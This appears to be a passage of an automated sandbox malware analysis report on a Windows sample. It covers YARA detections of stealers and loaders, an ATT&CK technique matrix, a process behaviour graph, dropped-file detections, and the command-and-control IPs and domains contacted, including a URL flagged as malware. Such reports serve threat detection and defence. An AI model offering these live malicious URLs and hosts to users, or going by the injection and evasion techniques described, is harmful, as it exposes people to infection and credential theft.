              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeProcess created: C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe 'C:\Users\user~1\AppData\Local\Temp\603c0340b4\sqtvvs.exe'
              Source: C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exeCode function: 27_2_00401C26 GetCurrentProcessId,memset,memset,_snwprintf,memset,ShellExecuteExW,WaitForSingleObject,GetExitCodeProcess,GetLastError,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A94E730 RtlDecodePointer,ZwQueryInformationProcess,RtlRaiseStatus,RtlAllocateAndInitializeSid,RtlAllocateHeap,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,RtlAllocateAndInitializeSid,
              Source: explorer.exe, 00000004.00000000.269132746.0000000001400000.00000002.00020000.sdmpBinary or memory string: uProgram Manager
              Source: explorer.exe, 00000004.00000000.287776975.0000000005F40000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: explorer.exe, 00000004.00000000.269132746.0000000001400000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: explorer.exe, 00000004.00000000.269132746.0000000001400000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: explorer.exe, 00000004.00000000.296208877.0000000000EB8000.00000004.00000020.sdmpBinary or memory string: ProgmanX
              Source: explorer.exe, 00000004.00000000.304691629.0000000008ACF000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWndAj
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeQueries volume information: C:\Users\user\AppData\Local\Temp\B82B.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\B82B.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\C1B2.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\C1B2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeQueries volume information: C:\Users\user\AppData\Local\Temp\DF9C.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeQueries volume information: C:\Users\user\AppData\Local\Temp\EA8A.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\EA8A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00410B13 cpuid
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\25Kf6vSBoq.exeCode function: 1_2_00422F80 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_0041F061 _free,_free,_free,GetTimeZoneInformation,_free,
              Source: C:\Users\user\AppData\Local\Temp\DF9C.exeCode function: 29_2_00401F20 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,
              Source: C:\Users\user\AppData\Local\Temp\CD0D.exeCode function: 22_2_6A944020 RtlGetVersion,RtlGetSuiteMask,RtlGetNtProductType,RtlInitUnicodeString,ZwQueryLicenseValue,RtlGetSuiteMask,RtlGetVersion,

              Stealing of Sensitive Information:

              barindex
              Yara detected RedLine StealerShow sources
              Source: Yara matchFile source: 00000027.00000000.491819153.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.500851808.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.495421124.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.494034054.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.568880871.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Yara detected SmokeLoaderShow sources
              Source: Yara matchFile source: 22.2.CD0D.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.irjbuft.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.0.irjbuft.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.0.irjbuft.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.CD0D.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.irjbuft.2bf15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.0.6EC5.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.1.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.0.6EC5.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.6EC5.exe.2c315a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.irjbuft.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.3.CD0D.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.0.irjbuft.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.25Kf6vSBoq.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.0.6EC5.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000016.00000003.418065622.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.462341902.0000000004791000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.382786562.0000000001F70000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.296771196.0000000002871000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.461574944.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.312112789.0000000002051000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.447688119.0000000004BA1000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.434655880.0000000003000000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.382804638.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.311815156.0000000000420000.00000004.00000001.sdmp, type: MEMORY
              Yara detected Amadey botShow sources
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Yara detected Raccoon StealerShow sources
              Source: Yara matchFile source: 0000001F.00000002.570848013.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000003.458016800.0000000004870000.00000004.00000001.sdmp, type: MEMORY

              Remote Access Functionality:

              barindex
              Yara detected RedLine StealerShow sources
              Source: Yara matchFile source: 00000027.00000000.491819153.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.500851808.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.495421124.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000000.494034054.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.568880871.0000000000402000.00000040.00000001.sdmp, type: MEMORY
              Yara detected SmokeLoaderShow sources
              Source: Yara matchFile source: 22.2.CD0D.exe.2fb0e50.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.1.irjbuft.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.0.irjbuft.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.0.irjbuft.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.CD0D.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 14.2.irjbuft.2bf15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.0.6EC5.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.1.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.25Kf6vSBoq.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.1.6EC5.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.0.6EC5.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.6EC5.exe.2c315a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.irjbuft.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.3.CD0D.exe.2fc0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.0.irjbuft.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.25Kf6vSBoq.exe.2dc15a0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.0.6EC5.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000016.00000003.418065622.0000000002FC0000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.462341902.0000000004791000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.382786562.0000000001F70000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000000.296771196.0000000002871000.00000020.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001C.00000002.461574944.0000000002B80000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.312112789.0000000002051000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.447688119.0000000004BA1000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.434655880.0000000003000000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.382804638.0000000001F91000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.311815156.0000000000420000.00000004.00000001.sdmp, type: MEMORY
              Yara detected Raccoon StealerShow sources
              Source: Yara matchFile source: 0000001F.00000002.570848013.0000000000400000.00000040.00020000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000003.458016800.0000000004870000.00000004.00000001.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsNative API1DLL Side-Loading11Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsShared Modules1Application Shimming1DLL Side-Loading11Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothEncrypted Channel11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsExploitation for Client Execution1Windows Service1Application Shimming1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsCommand and Scripting Interpreter12Registry Run Keys / Startup Folder1Access Token Manipulation1Software Packing13NTDSSystem Information Discovery26Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol5SIM Card SwapCarrier Billing Fraud
              Cloud AccountsService Execution2Network Logon ScriptWindows Service1Timestomp1LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol26Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonProcess Injection1012DLL Side-Loading11Cached Domain CredentialsSecurity Software Discovery441VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1File Deletion1DCSyncVirtualization/Sandbox Evasion131Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading11Proc FilesystemProcess Discovery3Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion131/etc/passwd and /etc/shadowApplication Window Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingSystem Owner/User Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection1012Input CaptureRemote System Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
              Compromise Software Supply ChainUnix ShellLaunchdLaunchdHidden Files and Directories1KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 511954 Sample: 25Kf6vSBoq.exe Startdate: 29/10/2021 Architecture: WINDOWS Score: 100 67 91.219.236.97, 49812, 80 SERVERASTRA-ASHU Hungary 2->67 69 toptelete.top 172.67.160.46, 49811, 80 CLOUDFLARENETUS United States 2->69 71 4 other IPs or domains 2->71 79 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->79 81 Antivirus detection for URL or domain 2->81 83 Antivirus detection for dropped file 2->83 85 13 other signatures 2->85 10 25Kf6vSBoq.exe 2->10         started        12 irjbuft 2->12         started        signatures3 process4 signatures5 15 25Kf6vSBoq.exe 10->15         started        103 Multi AV Scanner detection for dropped file 12->103 105 Machine Learning detection for dropped file 12->105 18 irjbuft 12->18         started        process6 signatures7 133 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 15->133 135 Maps a DLL or memory area into another process 15->135 137 Checks if the current machine is a virtual machine (disk enumeration) 15->137 139 Creates a thread in another existing process (thread injection) 15->139 20 explorer.exe 18 15->20 injected 25 DF9C.exe 15->25         started        process8 dnsIp9 73 216.128.137.31, 80 AS-CHOOPAUS United States 20->73 75 sysaheu90.top 185.98.87.159, 49747, 49748, 49749 VM-HOSTINGRU Russian Federation 20->75 77 3 other IPs or domains 20->77 43 C:\Users\user\AppData\Roaming\irjbuft, PE32 20->43 dropped 45 C:\Users\user\AppData\Roaming\fijbuft, PE32 20->45 dropped 47 C:\Users\user\AppData\Roaming\ffjbuft, PE32 20->47 dropped 51 10 other malicious files 20->51 dropped 87 System process connects to network (likely due to code injection or exploit) 20->87 89 Benign windows process drops PE files 20->89 91 Deletes itself after installation 20->91 93 Hides that the sample has been downloaded from the Internet (zone.identifier) 20->93 27 CD0D.exe 1 20->27         started        31 6EC5.exe 20->31         started        33 B82B.exe 21 6 20->33         started        36 4 other processes 20->36 49 C:\Users\user\AppData\Local\...\sqtvvs.exe, PE32 25->49 dropped file10 signatures11 process12 dnsIp13 53 C:\Users\user\AppData\Local\Temp\1105.tmp, PE32 27->53 dropped 107 Multi AV Scanner detection for dropped file 27->107 109 DLL reload attack detected 27->109 111 Detected unpacking (changes PE section rights) 27->111 127 4 other signatures 27->127 113 Machine Learning detection for dropped file 31->113 115 Contains functionality to inject code into remote processes 31->115 117 Injects a PE file into a foreign processes 31->117 38 6EC5.exe 31->38         started        59 cdn.discordapp.com 162.159.135.233, 443, 49773, 49774 CLOUDFLARENETUS United States 33->59 61 192.168.2.1 unknown unknown 33->61 55 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 33->55 dropped 119 Writes to foreign memory regions 33->119 121 Allocates memory in foreign processes 33->121 129 2 other signatures 33->129 41 AdvancedRun.exe 33->41         started        63 93.115.20.139, 28978, 49818 MVPShttpswwwmvpsnetEU Romania 36->63 65 162.159.129.233, 443, 49778 CLOUDFLARENETUS United States 36->65 57 C:\Users\user\AppData\...\AdvancedRun.exe, PE32 36->57 dropped 123 Antivirus detection for dropped file 36->123 125 Early bird code injection technique detected 36->125 131 2 other signatures 36->131 file14 signatures15 process16 signatures17 95 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 38->95 97 Maps a DLL or memory area into another process 38->97 99 Checks if the current machine is a virtual machine (disk enumeration) 38->99 101 Creates a thread in another existing process (thread injection) 38->101

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              25Kf6vSBoq.exe100%Joe Sandbox ML

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe100%AviraHEUR/AGEN.1138925
              C:\Users\user\AppData\Local\Temp\DF9C.exe100%AviraHEUR/AGEN.1138925
              C:\Users\user\AppData\Roaming\irjbuft100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\fijbuft100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\C1B2.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\9C1A.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\603c0340b4\sqtvvs.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\B82B.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\CD0D.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\EA8A.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\DF9C.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\F4BC.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Roaming\ffjbuft100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\6EC5.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\3D1.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\1105.tmp0%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\1105.tmp2%ReversingLabs
              C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe3%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\4c8d4506-0afb-4e86-ac6e-de7136a784d5\AdvancedRun.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe3%MetadefenderBrowse
              C:\Users\user\AppData\Local\Temp\65199d6b-dd97-46fe-8553-5c4399d816a6\AdvancedRun.exe0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\6EC5.exe45%ReversingLabsWin32.Trojan.Generic
              C:\Users\user\AppData\Local\Temp\B82B.exe39%ReversingLabsByteCode-MSIL.Trojan.CrypterX
              C:\Users\user\AppData\Local\Temp\CD0D.exe80%ReversingLabsWin32.Ransomware.StopCrypt
              C:\Users\user\AppData\Local\Temp\EA8A.exe43%ReversingLabsByteCode-MSIL.Trojan.Heracles
              C:\Users\user\AppData\Local\Temp\F4BC.exe57%ReversingLabsWin32.Trojan.Raccrypt
              C:\Users\user\AppData\Roaming\ffjbuft57%ReversingLabsWin32.Trojan.Raccrypt
              C:\Users\user\AppData\Roaming\fijbuft80%ReversingLabsWin32.Ransomware.StopCrypt
              C:\Users\user\AppData\Roaming\irjbuft45%ReversingLabsWin32.Trojan.Generic

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              16.0.irjbuft.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              29.0.DF9C.exe.8a0000.1.unpack100%AviraHEUR/AGEN.1138925Download File
              29.0.DF9C.exe.8a0000.10.unpack100%AviraHEUR/AGEN.1138925Download File
              29.0.DF9C.exe.8a0000.4.unpack100%AviraHEUR/AGEN.1138925Download File
              22.2.CD0D.exe.2fb0e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              29.0.DF9C.exe.8a0000.12.unpack100%AviraHEUR/AGEN.1138925Download File
              29.0.DF9C.exe.400000.15.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
              29.0.DF9C.exe.400000.5.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
              2.0.25Kf6vSBoq.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              13.2.6EC5.exe.2c315a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              29.0.DF9C.exe.8a0000.18.unpack100%AviraHEUR/AGEN.1138925Download File
              29.0.DF9C.exe.8a0000.16.unpack100%AviraHEUR/AGEN.1138925Download File
              23.0.DF9C.exe.460000.3.unpack100%AviraHEUR/AGEN.1138925Download File
              22.3.CD0D.exe.2fc0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.0.25Kf6vSBoq.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              16.1.irjbuft.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              16.0.irjbuft.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              16.0.irjbuft.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              29.0.DF9C.exe.400000.17.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
              16.0.irjbuft.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              22.2.CD0D.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              15.2.6EC5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              1.2.25Kf6vSBoq.exe.2dc15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              28.2.F4BC.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              2.1.25Kf6vSBoq.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              15.0.6EC5.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              15.0.6EC5.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              29.0.DF9C.exe.8a0000.3.unpack100%AviraHEUR/AGEN.1138925Download File
              23.0.DF9C.exe.460000.0.unpack100%AviraHEUR/AGEN.1138925Download File
              2.2.25Kf6vSBoq.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              29.0.DF9C.exe.8a0000.6.unpack100%AviraHEUR/AGEN.1138925Download File
              29.0.DF9C.exe.400000.7.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
              29.0.DF9C.exe.400000.11.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
              23.2.DF9C.exe.460000.0.unpack100%AviraHEUR/AGEN.1138925Download File
              16.0.irjbuft.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              15.0.6EC5.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              22.1.CD0D.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              15.1.6EC5.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              29.0.DF9C.exe.8a0000.14.unpack100%AviraHEUR/AGEN.1138925Download File
              28.3.F4BC.exe.2b80000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              15.0.6EC5.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              29.0.DF9C.exe.400000.13.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
              15.0.6EC5.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              2.0.25Kf6vSBoq.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              29.2.DF9C.exe.400000.0.unpack100%AviraHEUR/AGEN.1143239Download File
              28.2.F4BC.exe.2b70e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              16.2.irjbuft.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              29.0.DF9C.exe.8a0000.0.unpack100%AviraHEUR/AGEN.1138925Download File
              14.2.irjbuft.2bf15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              16.0.irjbuft.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              16.0.irjbuft.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              15.0.6EC5.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
              29.0.DF9C.exe.8a0000.8.unpack100%AviraHEUR/AGEN.1138925Download File
              23.0.DF9C.exe.460000.1.unpack100%AviraHEUR/AGEN.1138925Download File
              15.0.6EC5.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              29.0.DF9C.exe.400000.9.unpack100%AviraTR/AD.Amadey.ezxiuDownload File
              23.0.DF9C.exe.460000.2.unpack100%AviraHEUR/AGEN.1138925Download File
              29.0.DF9C.exe.8a0000.2.unpack100%AviraHEUR/AGEN.1138925Download File
              29.2.DF9C.exe.8a0000.1.unpack100%AviraHEUR/AGEN.1138925Download File

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://tempuri.org/DetailsDataSet1.xsd0%Avira URL Cloudsafe
              http://sysaheu90.top/game.exe100%Avira URL Cloudmalware
              http://91.219.236.97/0%Avira URL Cloudsafe
